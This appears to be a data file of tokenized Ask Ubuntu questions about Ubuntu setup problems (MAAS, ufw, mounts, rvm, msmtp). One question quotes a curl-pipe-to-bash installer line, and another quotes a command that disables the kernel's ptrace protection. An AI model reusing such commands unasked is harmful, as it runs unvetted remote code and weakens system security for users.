251988	when adding a maas node , avahiboot hangs on network configuration	please bear with me since i am a `` newbee '' here . i am trying to add a node ( virtualbox ) to a maas server ( ubuntu 12.04.01 ) . the maas server was installed fine and the image was installed and superuser was created . the node shows up as declared when i enlist it through ubuntu cd . i have a router which has dhcp server on it , so i did not install maas-dhcp server on maas server . i tried pxe booting , but did not work , so i tried to use avahiboot from here : https : //wiki.ubuntu.com/serverteam/maas/avahiboot ? action=recall & rev=2 it turns out that i could boot the node , but got a network configuration waiting message and it says it waits 60seconds more and showed me a login prompt with which i can not login . i checked the network connection and everything is fine with other vms , so network connection is not a problem . i checked the `` bridged adaptor '' in network configuration . please advise . thank you .
251991	two guest in one nat range ( virtualbox )	i have two vms ( ubuntu ) in virtualbox and i wan na assign the first one 10.0.3.15 and the other one 10.0.3.14 . but when i set network type to nat the network adresses are different , 10.0.3.15 and 10.0.4.15 . even when i change the range , one of them to another one statically in ubunutu i can not ping another one . i could not find any solution over the internet !
251992	stopping the launcher from appearing while dragging	when dragging and dropping anything , the launcher will automatically appear . i 'd prefer it to only appear if i pressed super while dragging , or something similar . this question was asked in 2011 , however there was no suitable answer and i was hoping that by now , there would at least be a hidden config option somewhere to change it .
251994	checkinstall asking for version	i have a autoconf/automake/autoeverything project that i 'm installing with checkinstall . when i go to install it , i 'm shown this this package will be built according to these values : 0 - maintainer : [ brooks94 @ foo.com ] 1 - summary : [ package created with checkinstall 1.6.2 ] 2 - name : [ mypkg ] 3 - version : [ ] 4 - release : [ 1 ] 5 - license : [ gpl ] 6 - group : [ checkinstall ] 7 - architecture : [ amd64 ] 8 - source location : [ mypkg ] 9 - alternate source location : [ ] 10 - requires : [ ] 11 - provides : [ mypkg ] 12 - conflicts : [ ] 13 - replaces : [ ] ... which generally looks good , but has a missing `` version '' . check install wo n't proceed until i manually give it a value . my question is , in what file can i put that version so that i do n't need to manually enter it ever time ?
251997	disc usage and file system	how can the root directory be at 100 percent disc usage while its subdirectories not be ? is space allocated on a per directory basis ? in the below example , it shows that the root is 100 percent used . does this mean if i try to add content to one of the nonroot directories , it should work but if i try to add to the root , it wo n't work ? i was expecting that 100 percent usage would be the total of all the directories added up , but as the example below shows , that 's not the case : $ df -h filesystem size used avail use % mounted on /dev/mapper/eubuntu10x32-root 3.5g 3.3g 0 100 % / none 1.5g 180k 1.5g 1 % /dev none 1.5g 0 1.5g 0 % /dev/shm none 1.5g 40k 1.5g 1 % /var/run none 1.5g 0 1.5g 0 % /var/lock none 1.5g 0 1.5g 0 % /lib/init/rw none 3.5g 3.3g 0 100 % /var/lib/ureadahead/debugfs /dev/sdb 50g 27g 21g 57 % /home /dev/sda1 228m 35m 181m 17 % /boot thanks for some explanation of disc usage on filesystem .
251998	ubuntu does n't see my tablet	i have ainol novo 10 quard tablet . when i connect it to ubuntu by usb , it does n't see it at all . do i need to install ainol drivers ? or something else ?
252007	how do i prevent directories mounted with 'bind ' from appearing on 'devices ' on nautilus ?	i have these lines in the fstab # binds /media/datantfs/music /home/can/music none rw , bind /media/datantfs/pictures /home/can/pictures none rw , bind /media/datantfs/downloads /home/can/downloads none rw , bind /media/datantfs/documents /home/can/documents none rw , bind /media/datantfs/backups /home/can/backups none rw , bind /media/datantfs/notes /home/can/notes none rw , bind /media/datantfs/other /home/can/other none rw , bind /media/datantfs/packages /home/can/packages none rw , bind /media/datantfs/photos /home/can/photos none rw , bind /media/datantfs/videos /home/can/videos none rw , bind /media/datantfs/workspace /home/can/workspace none rw , bind
252008	how to prevent an `` always on top '' application from usurping focus every time the workspace is switched	this is perhaps more suitable for brainstorm as a feature request or a candidate for bug reporting , but , for now , i 'll post it here : when telling an application to be both always on visible workspace and always on top this works , but , when switching workspaces , said application is not only always on top but also `` always in focus by default '' in all workspaces . in other words , it ( compiz ? unity ? ) does not remember being `` blurred '' ( ie , having lost focus to some other application ) in a given workspace , but rather reliably ( and reproducibly ) forgets all about it , as soon as switching to another workspace and then switching back again . this is not sth i 'd want to use every day , but right now i was wanting to have a long-ish video in vlc running as a `` picture-in-picture '' -type thing which i 'd pause and ignore and then run a bit more etc , whilst frequently switching workspaces ; basically keeping said application in the background ( somewhere on my large screen ) , but still visible , ie , `` on top '' .
252013	can i get .deb packages for lxde ?	is there any way i can download lxde and all its related packages as .deb packages ? i had done this with synaptic but since there 's no synaptic on 12.10 , can this be done with apt-get ? thanks
252014	undo automounting my second internal hdd at boot	when i installed 12.04 , i let ubuntu automount my second internal hdd at boot . now i formatted it and now it says `` /media/dateien is n't ready to mount '' at boot . by clicking 's ' i can normally continue booting . but i do n't want to have to click 's ' every time i 'm booting . how can i undo it that ubuntu searches for this hdd at boot ?
252015	ubuntu server apt-get install package_name which official site is the package downloaded from ?	when i run this in ssh : apt-get install package_name then the package is installed . but from which site ? is it http : //packages.debian.org i know in ruby when you run gem intall xxx the gem is downloaded from rubygems.org . and not that long ago the site was hacked and the hackers installed a payload in 1 gem . it is possible to find the gems at github and see what is going on . rubygems have also a status.rubygems.org . is there any similar to debian packages ?
252018	your ubuntu 12.04 is running in 2d mode . many features will not be available . ( ubuntu 12.04 )	what does that means and how to switch from 2d to 3d . i have a amd radeon7670m i tried installing and re installed the driver it recommended in additional drivers and i have checked synaptic package manager all the 2d and 3d related results are marked green.now what to do i am very confused .
252021	irc service and ufw firewall rules	i am securing my computer and have created same rules by utilizing ufw at cli . my question is this , in order to allow irc services with xchat 2.8.8 , and because irc service uses ports 6667 through 7000 , do i have to write a rule for each port , like : sudo ufw allow out 6667/tcp sudo ufw allow out 6668/tcp sudo ufw allow out 6669/tcp ... . sudo ufw allow out 7000/tcp or can i do something this way : sudo ufw allow out 6667:7000/tcp on the same subject let me ask you another question , does irc just uses tcp protocol or do i also have to write equal rules for the udp protocol ?
252023	how does a device get mounted via the unity launcher	when i click on a hard drive in the launcher , how does it know what parameters to apply to the mounted unit since the device is not shown or added in /etc/fstab . how can i add additional parameters to it so that , when i click on it , it mounts the device with the parameters i added . point in case , i want to add the relatime parameter to a hdd . this hdd is not in fstab but if i click on it in the launcher and then run mount i get this : /dev/sdb1 on /media/cyrex/xtreme type ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) so how did it know to have this parameters rw , nosuid , nodev , uhelper=udisks2 to this hdd and how can i add my parameters to this list ( without replacing the list , just adding to it ) . doing a cat /proc/mounts |grep /media/cyrex brings me the following : /dev/sdb1 /media/cyrex/xtreme ext4 rw , nosuid , nodev , relatime , data=ordered 0 0 /dev/sdc1 /media/cyrex/stuff ext4 rw , nosuid , nodev , relatime , data=ordered 0 0 /dev/sdd1 /media/cyrex/titan ext4 rw , nosuid , nodev , relatime , data=ordered 0 0 so for what i can tell , the parameters rw , nosuid , nodev , relatime , data=ordered 0 0 are the default for this hard drives . so how can i add an additional parameter to this list or tell the system that when it loads , for example , /dev/sdc1 it adds another parameter to it .
252030	how do i change the theme of the arduino ide ?	the theme.txt file is said to be somewhere in the the themes folder , which itself has to be in the arduino folder in /lib or /usr/lib , but i cant find either of the files . where are the files located ? is there any other way to change the theme ? *theme=color-scheme
252036	how can i temporarily `` mute '' all notification-bubbles coming from one or more sources ?	i have my system configured such that when i receive new mail , a notification balloon appears on my screen . this is convenient at times , and distracting at other times . without having to uninstall the gmail integration i 'm using , is there a way of centrally toggling whether certain kinds of notifications will be displayed ? in other words , i 'm looking for an application ( or api ) which allows me to either see a list of `` registered '' apps that use the notification service , and toggle them as enabled/disabled . or , something which allows me to create one or more regular expressions which can be used to match the source-application-name or notification-bubble-content , and if a match occurs , to block the notification .
252039	how can i find out the current drive spin-down time ?	i 'm interested in manually adjusting my hard drives ' spin-down times with hdparm -s to make them quieter at night . the first thing i need to know is what their current spin-down times are , to use as a reference point and so i know what kind of changes i can expect . where can i look up this information ? details i am not asking how to look up the current advanced power management setting ( hdparm -b ) .
252047	how do i setup multiple suites in reprepro ?	i want a private apt repository for stable and unstable lucid packages . i keep getting an error when i try to include a debian . multiple distributions with the common codename : 'lucid ' ! first was in ./conf/distributions line 1 to 8 , another in lines 10 to 17there have been errors ! i 'm using this config file . origin : stable repository label : stable repository suite : stable codename : lucid architectures : i386 amd64 components : main non-free description : stable repository signwith : yes origin : unstable repository label : unstable repository suite : unstable codename : lucid architectures : i386 amd64 components : main non-free description : unstable repository signwith : yes what 's wrong with my config file ?
252056	should i use tasksel , tasks in apt or install regular metapackages ?	tasksel or plain apt ? in the past i 've always used tasksel to install so-called `` tasks '' . it seems , however , that this has been integrated in apt : apt-cache dumpavail | grep ^task [ ... ] snip task : lamp-server [ ... ] and that i can install such `` tasks '' by appending a caret ( ^ ) to it , like this : sudo apt-get install lamp-server^ is this equivalent to the following ? sudo tasksel install lamp-server and which is preferred ? metapackages additionally , how do metapackages come into play here ? some tasks seem not to be a metapackage while others are : apt-cache show lamp-server n : unable to locate package lamp-server apt-cache show kubuntu-desktop package : kubuntu-desktop [ ... ] task : kubuntu-desktop so , using the last example , what is the difference between the following three possible ways to install ? sudo apt-get install kubuntu-desktop sudo apt-get install kubuntu-desktop^ sudo tasksel install kubuntu-desktop
252057	how can i display a message on the login screen ?	in some circumstances it would be valuable for me to be presented with a short , text notification prior to logging in , so that i have the option to decide not to log in after seeing the message . is there a way to display a notification message on the graphical login screen ?
252058	getting started with ubuntu	i installed ubuntu over a year ago on my dell pc . i have just decided to try to run freebasic on the ubuntu system . on powering-up my pc i have used the 'select ubuntu ' option but even after an hour has elapsed , all i get on the screen is your purple'ish-coloured background ( same as background on this page ) , and it periodically displays a log-on/sign-in box for about 2 seconds . i have no idea what to do next . ( am using internet explorer & windowsxp , unaware of version no . for ubuntu )
252059	thunar not displaying thumbnails for text files	i have gone through all other posts on thunar thumbnailing issue but this one does n't seem to match any of those ; nor on the web anyone seems to have this problem , so i could n't find solution on google either . also , i have the following packages installed - thunar ( version 1.2.3 ) , tumbler . i am using ubuntu 12.04 [ updated ] . this is what i expect ( pic from nautilus ) - this is what i am getting ( pic from thunar itself ) - thunar is much better than nautilus in all expects , but for small ones like this one . kindly help .
252060	how to execute a script before login screen ?	i would like to know , how can i run scripts before the login screen.i mean my script should start running before login screen will appear.how can i achieve that ? . i am the root user of that pc . os : ubuntu 12.04 lts
252062	highlighting gtk entry fields on invalid input by user	i am creating a program using python and gtk . i want to guide the user by pointing out mistakes if any . i have attached a sample glade interface below . here the user is supposed to enter a valid station name in the gtkentry field . i want to highlight this field with red color ( for instance ) if he presses the submit button . how do i achieve this in gtk3 with python ?
252063	unable to mount flash drive or sd/sdhc card in device/dev/sdf* already mounted at '/media/usb* '	but when i look in the home folder they show up in the left hand section and i have full access . it looks like i have caused an unintended consequence in trying to find solutions to an earlier problem with the card reader ( now fixed ) . when i click to dis-mount usb stick or sd/sdhc card i am asked to supply my admin password ! do i need to fix this situation ? if yes , how ? thank you njsg , terminal output as requested and thank you for your patience , with usb stick in multi-card reader , roger @ roger-desktop : ~ $ mount /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/roger/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=roger ) /dev/sdf1 on /media/usb0 type vfat ( rw , noexec , nodev , sync , noatime , nodiratime ) roger @ roger-desktop : ~ $ roger @ roger-desktop : ~ $ dmesg | grep sdf [ 218.603341 ] sd 9:0:0:0 : [ sdf ] 7806976 512-byte logical blocks : ( 3.99 gb/3.72 gib ) [ 218.604450 ] sd 9:0:0:0 : [ sdf ] write protect is off [ 218.604455 ] sd 9:0:0:0 : [ sdf ] mode sense : 23 00 00 00 [ 218.605449 ] sd 9:0:0:0 : [ sdf ] no caching mode page present [ 218.605453 ] sd 9:0:0:0 : [ sdf ] assuming drive cache : write through [ 218.610441 ] sd 9:0:0:0 : [ sdf ] no caching mode page present [ 218.610448 ] sd 9:0:0:0 : [ sdf ] assuming drive cache : write through [ 218.637917 ] sdf : sdf1 [ 218.643388 ] sd 9:0:0:0 : [ sdf ] no caching mode page present [ 218.643396 ] sd 9:0:0:0 : [ sdf ] assuming drive cache : write through [ 218.643401 ] sd 9:0:0:0 : [ sdf ] attached scsi removable disk roger @ roger-desktop : ~ $ with usb stick and sdhc card in multi-card reader , roger @ roger-desktop : ~ $ mount /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/roger/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=roger ) /dev/sdf1 on /media/usb0 type vfat ( rw , noexec , nodev , sync , noatime , nodiratime ) /dev/sdb1 on /media/usb1 type vfat ( rw , noexec , nodev , sync , noatime , nodiratime ) roger @ roger-desktop : ~ $ roger @ roger-desktop : ~ $ dmesg | grep sdf [ 218.603341 ] sd 9:0:0:0 : [ sdf ] 7806976 512-byte logical blocks : ( 3.99 gb/3.72 gib ) [ 218.604450 ] sd 9:0:0:0 : [ sdf ] write protect is off [ 218.604455 ] sd 9:0:0:0 : [ sdf ] mode sense : 23 00 00 00 [ 218.605449 ] sd 9:0:0:0 : [ sdf ] no caching mode page present [ 218.605453 ] sd 9:0:0:0 : [ sdf ] assuming drive cache : write through [ 218.610441 ] sd 9:0:0:0 : [ sdf ] no caching mode page present [ 218.610448 ] sd 9:0:0:0 : [ sdf ] assuming drive cache : write through [ 218.637917 ] sdf : sdf1 [ 218.643388 ] sd 9:0:0:0 : [ sdf ] no caching mode page present [ 218.643396 ] sd 9:0:0:0 : [ sdf ] assuming drive cache : write through [ 218.643401 ] sd 9:0:0:0 : [ sdf ] attached scsi removable disk roger @ roger-desktop : ~ $ note , where sdf appears in square brackets above it is red in terminal . for both the usb stick and sdhc card i can read and copy to my pc , but i can not write from pc to them . using ubuntu home folder , devices , properties both have msdos file systems . when i plug them into a windows xp laptop they are both fat32 file system . does that mean that ubuntu sees fat32 as msdos ?
252064	gem install error : `` can not load such file -- zlib ''	i 'm trying to install ruby on rails from scratch on ubuntu 12.10 . getting help from this post : echo `` [ [ -s ' $ { home } /.rvm/scripts/rvm ' ] ] & & source ' $ { home } /.rvm/scripts/rvm ' '' > > ~/.bashrc echo `` [ [ -s ' $ { home } /.rvm/scripts/rvm ' ] ] & & source ' $ { home } /.rvm/scripts/rvm ' '' > > ~/.zshrc curl -l https : //get.rvm.io | bash -s stable # then run this in order to make rvm work : source /home/adige/.rvm/scripts/rvm # and installed zlib , before ruby : rvm pkg install zlib # last step , installed ruby : rvm install 1.9.3 -- with-zlib-dir=/home/adige/.rvm/usr but the problem is when i try to install gems i get this error : adige @ adige-lg : ~ $ gem install rails error : loading command : install ( loaderror ) can not load such file -- zlib error : while executing gem ... ( nameerror ) uninitialized constant gem : :commands : :installcommand i already have these : curl zlib1g-dev zlib1g libssl-dev build-essential openssl libreadline6 libreadline6-dev curl git-core libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt-dev autoconf libc6-dev ncurses-dev automake libtool bison subversion pkg-config so what may be the problem ?
252066	logitech c310 webcam echoing	when i try to use skype , my voice echoes . i usually will also get what sounds like feedback . if i use the skype echo test , my voice plays back fine . i have tried capturing video with vlc and have the exact same issues . i used guvcview as a quick test and that seemed to work fine . i also tested recording using audacity and that played back fine . system specs : amd quad core a6 3620 radeon hd 6530d 4gb memory ubuntu 12.10 with all updates answered on the ubuntu forums at this url http : //ubuntuforums.org/showthread.php ? t=2106355
252067	ubuntu installation from windows 7 , reboots again	i am running windows 7 , and wanted to install ubuntu from my usb . whenever i come to the option , where i can choose whether to replace windows or install it additionally , i click next and the computer reboots . it reboots to the installation settings . i tried to switch my bios to boot from the hard disk in between , but it throws me back to windows . any suggestions ?
252072	cant log in to gui , x is broken	note to others if you just want a summary of the problem skip down to summary . this first part is going to be slightly long and hopefully entertaining . as in , that is screwed up ! but there might be a clue in there . so i bought my laptop . from the very beginning , and occasionally for no known reason it 's screen would freeze . the keyboard would freeze and the keyboard shortcuts on wikipediea , that try and shut down a frozen computer , were quickly found . the shortcuts did n't work either . it did n't happen often and got better with updates . better means less frequently . eventually it would happen only when under heavy load , when i was in chromium with 10 tabs . annoying but with no solution , i ignored it . well two days ago before work it did this , i shut the computer down as i always did , by holding down the power button . it popped back up and ran a hard drive check as it sometimes did and brought me to the login screen . which is different then most times , usually it goes straight to the desktop . so i typed in my password and nothing happened , fine i called up a terminal trying to shut down the computer first by ctrl-alt-f2 as i always do . my computer not being frozen goes to command line , i log in and i type in one of the few commands i now know by heart sudo reboot ! and it does in ten seconds , ssds rock . and comes to the login screen . vague recognition occurs that this is n't kansas anymore toto , and crap i have n't backed up in a while . no do n't groan , i swear i 'll back up more often , i swear i will learn what rsync does and create a keyboard short cut to back up my home folder . i 'll go through rehab i swear just help me get my wallpapers and documents back please ! i broke x and i do n't even know what x is , its a video thingy mag jig , that puppy linux ( dell mini sometimes ) asks me x versa or x org . so i broke out my netbook a dell mini 9 that i bought with a tax return , i now have internet with a small screen , to small to enjoy really , 12 inch minimum is recommended , maybe 10 with a tablet . i come the interwebs for a solution and nothing . my google fu has failed me . i think , well lets upgrade to 12.10 , that should keep my files and fix the problem . well it starts and i go to work . and does n't work . i am now ubuntu 12.10 and no gui . i try to reinstall the gnome shell via a command on the internet choose lightdm and nothing . i have tried these commands ( not necessarily in order ) sudo apt-get system76-driver , sudo dpkg –configure -a , sudo apt-get gnome-shell , sudo apt-get autoremove , sudo apt-get update , sudo start lightdm , sudo stop lightdm , do release-upgrade , sudo stopx , sudo killx , sudo startx , and sudo lsusb ( that last did n't help me at all , note a lot of the responses went over my head ) so being terminaly board , get it i am in the terminal and board , and being as i have to go to work in an hour and being ready to work i type in the commands to run diablo 3 i run my ptrace command echo 0| sudo tee /proc/sys/kernel/yama/ptrace_scope *force_s3tc_enable=true setarch i386 -3 -l -b -r /opt/cxoffice/bin/wine –bottle “diablo iii” -- cx-app “diablo iii laucher.exe” and i am sure you are just shocked shocked to hear that i did n't run . it ca n't create a window , ca n't find a driver or some such . and if your thinking thats an lot of flags and command line fu for someone who does n't speak the language , your right , you would be surprised to find out what a monkey with an internet connection , the ability to copy , with out really understanding whats going on , can do . yes i am not an idiot , yes i am learning , but no i really dont know what i am doing . downloaded a book to kindle today on the ubuntu command line . what i want from the readership here a brilliant concise solution thats easy to implement to just fix x. or a solution to fix my x and/or someone tell me how to find my pictures folder path , documents folder path , and my usb path ( it still auto mounts apparently ) so i can use the copy command i found and copy to my stuff to usb and in my second hardrive mounted in my computer i have file i need /unknownpathtoharddrive/oss/ubuntu12.1064bit.iso i would like to get that to my usb . summary system spec ubuntu 12.10 64 bit 15.6 '' 1080p full high definition led backlit display featuring 95 % ntsc color gamut in matte finished surface ( 1920 x 1080 ) intel hd graphics 4000 3rd generation intel core i7-3610qm processor ( 2.30ghz 6mb l3 cache - 4 cores plus hyperthreading ) 8 gb dual channel ddr3 sdram at 1600mhz - 2 x 4gb 120 gb intel 520 series sata iii 6 gb/s solid state disk drive 750 gb 7200 rpm hdd + caddy case intel centrino advanced-n 6235 - 802.11a/b/g/n wireless lan + bluetooth combo module gui borked , does n't work kewbluie , snafu , oh snap ... . you get the idea infinite login loop wrong password produces “incorrect password” correct password produces a bell and goes back to login page ( or never leaves ? ) good news- ctrl-alt-f2 works and gives me a command line . and i can log in ! problem-i do n't speak command line . vim ? haha your kidding right problem- i do n't know the commands so it can report the problem so i cant google the answer help ? vague goal of reinstalling without losing a couple of word documents and wallpapers i have tried : stop and start x , stop and start lightdm , installing updates , ubuntu upgrade , and running dablo and natulius update : just tried to log in under guest , full gui interface , now i am flumuixed , so its some setting that does n't allow me to log in with a gui on my main account , but i can with the comand line , as soon i get my info fresh install .
252073	how can i access mobile broadband from my usb stick ?	i ca n't access the internet using my usb modem on my laptop . while i can access the internet from my pc . both are running ubuntu 12.04 . what can i do to detect the problem ? here the result of lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 004 : id 0c45:6461 microdia bus 002 device 003 : id 19d2:0033 zte wcdma technologies msm bus 002 device 004 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm246 bluetooth ) bus 002 device 005 : id 413c:8161 dell computer corp . integrated keyboard bus 002 device 006 : id 413c:8162 dell computer corp . integrated touchpad [ synaptics ] bus 002 device 007 : id 413c:8160 dell computer corp. wireless 365 bluetooth and here the reult of sudo lshw -class network pci ( sysfs ) *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:12:00.0 logical name : wlan0 version : 01 serial : 70 : f1 : a0 : a0:00:00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.2.0-37-generic firmware=n/a ip=172.16.4.55 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : fbc00000-fbc03fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:13:00.0 logical name : eth0 version : 02 serial : a4 : ba : d0 : c0 : f0 : f0 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:45 ioport : e000 ( size=256 ) memory : d0b10000-d0b10fff memory : d0b00000-d0b0ffff memory : fb200000-fb21ffff the result of tailf /var/log/syslog after plugging the modem in feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < info > activation ( ttyusb3 ) starting connection 'mobinil default 1' feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < info > ( ttyusb3 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < info > activation ( ttyusb3 ) stage 1 of 5 ( device prepare ) scheduled ... feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < info > activation ( ttyusb3 ) stage 1 of 5 ( device prepare ) started ... feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < info > activation ( ttyusb3 ) stage 1 of 5 ( device prepare ) complete . feb 8 13:32:14 inspiron-n5010 modem-manager [ 885 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( registered - > connecting ) feb 8 13:32:14 inspiron-n5010 modem-manager [ 885 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connecting - > registered ) feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < warn > gsm connection failed : ( 32 ) no cause information available feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < info > ( ttyusb3 ) : device state change : prepare - > failed ( reason 'unknown ' ) [ 40 120 1 ] feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < warn > activation ( ttyusb3 ) failed . feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < info > ( ttyusb3 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : < info > ( ttyusb3 ) : deactivating device ( reason 'none ' ) [ 0 ] feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : nm_system_iface_flush_routes : assertion `ifindex > 0 ' failed feb 8 13:32:14 inspiron-n5010 networkmanager [ 911 ] : nm_system_iface_flush_addresses : assertion `ifindex > 0 ' failed
252084	help me with my sound	my sound card is recognized and i have tried every troubleshooting tactic on https : //help.ubuntu.com/community/soundtroubleshooting and using all the tactics from no sound in ubuntu 12.04 . i just recently reformatted my computer to run only ubuntu 12.04 , before that i was running windows and ubuntu 11.10 . my sound was n't working then , and i thought reformatting my hard drive would have helped , but it did n't . also , the sound works perfectly when i use my headphones or other auxiliary output device , but never when i want to use my computer speakers .
252085	no wireless / wired on 12.10	recently , i have installed ubuntu 12.10 along with windows 7 ( after which i upgraded to windows 8 ) , but i have never been able to get any network connection on ubuntu , wireless nor wired . works fine on windows . i am on a hp probook 4510s . my ethernet controller : marvell technology group ltd. 88e8072 pci-e gigabit ethernet controller my wireless controller : broadcom corporation bcm4312 802.11b/g lp-phy
252090	12.04 how to automatically boot to single user mode with auto login	i just installed ubuntu 12.04 on one of 4 machines and am configuring it . when the machine is used in `` production '' mode it will be headless and will need to boot into single user mode automatically ( and start an application ) . it will need partitions mounted , networking , ssh , etc . i want to test booting into single user mode now so as to get it right before installing/upgrading other machines to 12.04 .
252098	is it possible to use gnome shell 3.6 with 12.04 ?	i managed to get stuck on gnome shell 3.5.4 . i want to get to 3.6 so that i can get my extensions back . i ca n't seem to find an answer on whether i must go to 12.10 . i 'd prefer to not do a version upgrade yet . how would i get to 3.6 ( or higher ) ? or am i stuck with 3.5.4 ?
252101	problems allowing outgoing multicast in ufw	i am having problems configuring the uncomplicated firewall ( ufw ) to allow outgoing multicast traffic . i am blocking all in and outgoing connections as the default policy . i have supplemented with the rules listed below . yet , i get these error messages repeated twice after every time i boot the system : errors ( repeated twice on boot-up ) : [ ufw block ] in= out=eth0 src=192.168.0.2 dst=224.0.0.22 len=40 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 [ ufw block ] in= out=eth0 src=fe80:0000:0000:0000 : f66d : feee : feee : feee dst=ff02:0000:0000:0000:0000:0000:0000:0002 len=56 tc=0 hoplimit=255 flowlbl=0 proto=icmpv6 type=133 code=0 [ ufw block ] in= out=eth0 src=fe80:0000:0000:0000 : f66d:04ff : feee : df54 dst=ff02:0000:0000:0000:0000:0000:0000:0016 len=96 tc=0 hoplimit=1 flowlbl=0 proto=icmpv6 type=143 code=0 main rules : ufw allow out proto udp to 224.0.0.0/3 ufw allow out proto udp to ff00 : :/8 ufw allow in proto udp to 224.0.0.0/3 ufw allow in proto udp to ff00 : :/8 in /etc/ufw/user.rules : -a ufw-before-input -p igmp -d 224.0.0.0/3 -j accept -a ufw-before-output -p igmp -d 224.0.0.0/3 -j accept and in /etc/ufw/user6.rules : -a ufw6-before-input -p icmpv6 -d ff00 : :/8 -j accept -a ufw6-before-output -p icmpv6 -d ff00 : :/8 -j accept
252106	would ubuntu 12.10 on a dell inspiron e1405 ( intel core duo t2300 ( 1.66 ghz/2mb l2 cache ) be too slow ?	would ubuntu 12.10 on a dell inspiron e1405 ( intel core duo t2300 ( 1.66 ghz/2mb l2 cache ) be too slow ? also , it only has 1gb ram
252107	what is the equivalent to android intent and broadcastreceiver ?	i 've played with and written code for android and i learned the concept of intents and broadcastreceivers in android . they are used to call apps for specific purposes like making a call or playing music or asking for enabling bluetooth . apps can register for these intents , which get usually `` broadcasted '' and then can handle them . what is the proposed equivalent to that on the ubuntu ( freedesktop , whatever ) platform ? specifically in the context of phone apps , but also for desktop apps . first i would think of uri schema handlers , and than with more doubt , some dbus construct .
252111	msmtp not working ?	i was trying to send mail from bash , but it does n't work and i ca n't find the reason ... so my .msmtprc file is account default host smtp.gmail.com port 587 from account @ gmail.com tls on tls_starttls on tls_trust_file /etc/ssl/certs/ca-certificates.crt auth on user account @ gmail.com password password logfile ~/.msmtp ( instead of account and password , of course , i have my data written ) then i use command msmtp -t < test.txt and no mail is sent ( test.txt contains to : , from : , subject : and text ) ! i 've been struggling with this for some time , and it 's really annoying ... any help would be appreciated . thanks in advance !
252115	ntfs vs ext4 behavior on a hdd with a bad block	anyone have a guess as to why a hdd , formatted to ext3 , failed showing a bad block , and when wiped and reformatted ( just to test ) gave errors in gparted for every file type except ntfs ? the drive gave me input/output errors . i had all the data backed up anyway , so i decided to just play with it , running scans , checks , repairs of every sort just to get some practice . i fired up gparted , and attempted to format it to every type down the list , and suddenly ntfs took to it without issue . i even tried to reformat it again , every type , and got an error every time again except with ntfs . is it safe to use that way ? does ntfs work around bad blocks and sectors ? before i turn the drive into slag or an art project , i would like to figure out this mystery .
